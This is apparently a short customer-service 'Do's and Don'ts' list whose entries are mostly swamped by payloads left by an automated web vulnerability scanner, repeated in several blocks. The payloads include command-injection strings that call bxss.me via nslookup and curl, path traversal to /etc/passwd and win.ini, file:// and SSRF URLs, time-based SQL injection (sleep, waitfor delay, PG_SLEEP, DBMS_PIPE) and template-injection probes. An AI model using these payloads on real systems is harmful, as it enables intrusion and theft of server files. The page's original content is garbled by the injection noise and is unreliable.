Do's
Don'ts
Keep a clear and consistent voice
DPA check with existing customers, DOB, First line of address and Postcode
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vunerability
Read validation script
1
1
1
response.write(9831047*9215501)
'+response.write(9831047*9215501)+'
echo emhlad$()\ gwlwsp\nz^xyu||a #' &echo emhlad$()\ gwlwsp\nz^xyu||a #|" &echo emhlad$()\ gwlwsp\nz^xyu||a #
"+response.write(9831047*9215501)+"
../../../../../../../../../../../../../../etc/passwd
&echo jnkvls$()\ uctipe\nz^xyu||a #' &echo jnkvls$()\ uctipe\nz^xyu||a #|" &echo jnkvls$()\ uctipe\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
file:///etc/passwd
|echo qyynye$()\ zfhdqv\nz^xyu||a #' |echo qyynye$()\ zfhdqv\nz^xyu||a #|" |echo qyynye$()\ zfhdqv\nz^xyu||a #
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1
Http://bxss.me/t/fit.txt
(nslookup -q=cname hitoupsoxobfx83c21.bxss.me||curl hitoupsoxobfx83c21.bxss.me))
../1
$(nslookup -q=cname hitqsipgexwltd007d.bxss.me||curl hitqsipgexwltd007d.bxss.me)
http://bxss.me/t/fit.txt?.jpg
&nslookup -q=cname hitfitfjojiht626bb.bxss.me&'\"`0&nslookup -q=cname hitfitfjojiht626bb.bxss.me&`'
1
/etc/shells
&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&'\"`0&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&`'
'"()
c:/windows/win.ini
1'&&sleep(27*1000)*cmomax&&'
1"&&sleep(27*1000)*hammye&&"
|(nslookup -q=cname hitziwcbjdaco7832b.bxss.me||curl hitziwcbjdaco7832b.bxss.me)
1'||sleep(27*1000)*gwsbuw||'
1"||sleep(27*1000)*kjwjtf||"
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
`(nslookup -q=cname hitjviaugqrbbfe46f.bxss.me||curl hitjviaugqrbbfe46f.bxss.me)`
1'"()&%
add_do.php
add_do.php
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1�%2527%2522
@@oRiGb
1
DPA check with existing customers, DOB, First line of address and Postcode
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vunerability
Read validation script
1
1
1
response.write(9831047*9215501)
'+response.write(9831047*9215501)+'
echo emhlad$()\ gwlwsp\nz^xyu||a #' &echo emhlad$()\ gwlwsp\nz^xyu||a #|" &echo emhlad$()\ gwlwsp\nz^xyu||a #
"+response.write(9831047*9215501)+"
../../../../../../../../../../../../../../etc/passwd
&echo jnkvls$()\ uctipe\nz^xyu||a #' &echo jnkvls$()\ uctipe\nz^xyu||a #|" &echo jnkvls$()\ uctipe\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
file:///etc/passwd
|echo qyynye$()\ zfhdqv\nz^xyu||a #' |echo qyynye$()\ zfhdqv\nz^xyu||a #|" |echo qyynye$()\ zfhdqv\nz^xyu||a #
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1
Http://bxss.me/t/fit.txt
(nslookup -q=cname hitoupsoxobfx83c21.bxss.me||curl hitoupsoxobfx83c21.bxss.me))
../1
$(nslookup -q=cname hitqsipgexwltd007d.bxss.me||curl hitqsipgexwltd007d.bxss.me)
http://bxss.me/t/fit.txt?.jpg
&nslookup -q=cname hitfitfjojiht626bb.bxss.me&'\"`0&nslookup -q=cname hitfitfjojiht626bb.bxss.me&`'
1
/etc/shells
&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&'\"`0&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&`'
'"()
c:/windows/win.ini
1'&&sleep(27*1000)*cmomax&&'
1"&&sleep(27*1000)*hammye&&"
|(nslookup -q=cname hitziwcbjdaco7832b.bxss.me||curl hitziwcbjdaco7832b.bxss.me)
1'||sleep(27*1000)*gwsbuw||'
1"||sleep(27*1000)*kjwjtf||"
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
`(nslookup -q=cname hitjviaugqrbbfe46f.bxss.me||curl hitjviaugqrbbfe46f.bxss.me)`
1'"()&%
add_do.php
add_do.php
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1�%2527%2522
@@oRiGb
1
1
1
1
1
1
1
response.write(9671713*9450312)
'+response.write(9671713*9450312)+'
"+response.write(9671713*9450312)+"
echo vsrjea$()\ vibmcc\nz^xyu||a #' &echo vsrjea$()\ vibmcc\nz^xyu||a #|" &echo vsrjea$()\ vibmcc\nz^xyu||a #
&echo swjyzb$()\ keolga\nz^xyu||a #' &echo swjyzb$()\ keolga\nz^xyu||a #|" &echo swjyzb$()\ keolga\nz^xyu||a #
|echo xucwxb$()\ nllyww\nz^xyu||a #' |echo xucwxb$()\ nllyww\nz^xyu||a #|" |echo xucwxb$()\ nllyww\nz^xyu||a #
(nslookup -q=cname hitilrmbpgqfz800f1.bxss.me||curl hitilrmbpgqfz800f1.bxss.me))
$(nslookup -q=cname hitsaaawtkssx45eda.bxss.me||curl hitsaaawtkssx45eda.bxss.me)
&nslookup -q=cname hitnqyranvedc5f058.bxss.me&'\"`0&nslookup -q=cname hitnqyranvedc5f058.bxss.me&`'
&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&'\"`0&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&`'
|(nslookup -q=cname hitqbamssehjo30a02.bxss.me||curl hitqbamssehjo30a02.bxss.me)
`(nslookup -q=cname hitdeayycanig5c483.bxss.me||curl hitdeayycanig5c483.bxss.me)`
../../../../../../../../../../../../../../etc/passwd
;(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)|(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)&(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
../../../../../../../../../../../../../../windows/win.ini
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
file:///etc/passwd
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
1
/etc/shells
../1
c:/windows/win.ini
1
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
add_dont.php
1
add_dont.php
add_dont.php/.
'"()
1'"()&%
1'&&sleep(27*1000)*xoevcn&&'
1"&&sleep(27*1000)*eshjbq&&"
19997094
1'||sleep(27*1000)*ejagqz||'
1"||sleep(27*1000)*twuifi||"
bfg3695<s1﹥s2ʺs3ʹhjl3695
bfgx4241z1z2abcxhjl4241
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg5995<s1﹥s2ʺs3ʹhjl5995
bfgx6109z1z2abcxhjl6109
<%={{={@{#{${dfb}}%>
1
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+789-789-1=0+0+0+1 --
-1 OR 2+979-979-1=0+0+0+1
-1' OR 2+126-126-1=0+0+0+1 --
-1' OR 2+686-686-1=0+0+0+1 or 'nGVyNcrb'='
-1" OR 2+907-907-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
jlJJwDOp'; waitfor delay '0:0:15' --
-5 OR 249=(SELECT 249 FROM PG_SLEEP(15))--
-5) OR 47=(SELECT 47 FROM PG_SLEEP(15))--
-1)) OR 569=(SELECT 569 FROM PG_SLEEP(15))--
2A8vCF17' OR 385=(SELECT 385 FROM PG_SLEEP(15))--
8nm7cbmj') OR 770=(SELECT 770 FROM PG_SLEEP(15))--
Ef1kRjXr')) OR 785=(SELECT 785 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1�%2527%2522
@@zgFhD
1
1
1
1
1
1
response.write(9671713*9450312)
'+response.write(9671713*9450312)+'
"+response.write(9671713*9450312)+"
echo vsrjea$()\ vibmcc\nz^xyu||a #' &echo vsrjea$()\ vibmcc\nz^xyu||a #|" &echo vsrjea$()\ vibmcc\nz^xyu||a #
&echo swjyzb$()\ keolga\nz^xyu||a #' &echo swjyzb$()\ keolga\nz^xyu||a #|" &echo swjyzb$()\ keolga\nz^xyu||a #
|echo xucwxb$()\ nllyww\nz^xyu||a #' |echo xucwxb$()\ nllyww\nz^xyu||a #|" |echo xucwxb$()\ nllyww\nz^xyu||a #
(nslookup -q=cname hitilrmbpgqfz800f1.bxss.me||curl hitilrmbpgqfz800f1.bxss.me))
$(nslookup -q=cname hitsaaawtkssx45eda.bxss.me||curl hitsaaawtkssx45eda.bxss.me)
&nslookup -q=cname hitnqyranvedc5f058.bxss.me&'\"`0&nslookup -q=cname hitnqyranvedc5f058.bxss.me&`'
&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&'\"`0&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&`'
|(nslookup -q=cname hitqbamssehjo30a02.bxss.me||curl hitqbamssehjo30a02.bxss.me)
`(nslookup -q=cname hitdeayycanig5c483.bxss.me||curl hitdeayycanig5c483.bxss.me)`
../../../../../../../../../../../../../../etc/passwd
;(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)|(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)&(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
../../../../../../../../../../../../../../windows/win.ini
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
file:///etc/passwd
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
1
/etc/shells
../1
c:/windows/win.ini
1
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
add_dont.php
1
add_dont.php
add_dont.php/.
'"()
1'"()&%
1'&&sleep(27*1000)*xoevcn&&'
1"&&sleep(27*1000)*eshjbq&&"
19997094
1'||sleep(27*1000)*ejagqz||'
1"||sleep(27*1000)*twuifi||"
bfg3695<s1﹥s2ʺs3ʹhjl3695
bfgx4241z1z2abcxhjl4241
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg5995<s1﹥s2ʺs3ʹhjl5995
bfgx6109z1z2abcxhjl6109
<%={{={@{#{${dfb}}%>
1
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+789-789-1=0+0+0+1 --
-1 OR 2+979-979-1=0+0+0+1
-1' OR 2+126-126-1=0+0+0+1 --
-1' OR 2+686-686-1=0+0+0+1 or 'nGVyNcrb'='
-1" OR 2+907-907-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
jlJJwDOp'; waitfor delay '0:0:15' --
-5 OR 249=(SELECT 249 FROM PG_SLEEP(15))--
-5) OR 47=(SELECT 47 FROM PG_SLEEP(15))--
-1)) OR 569=(SELECT 569 FROM PG_SLEEP(15))--
2A8vCF17' OR 385=(SELECT 385 FROM PG_SLEEP(15))--
8nm7cbmj') OR 770=(SELECT 770 FROM PG_SLEEP(15))--
Ef1kRjXr')) OR 785=(SELECT 785 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1�%2527%2522
@@zgFhD
1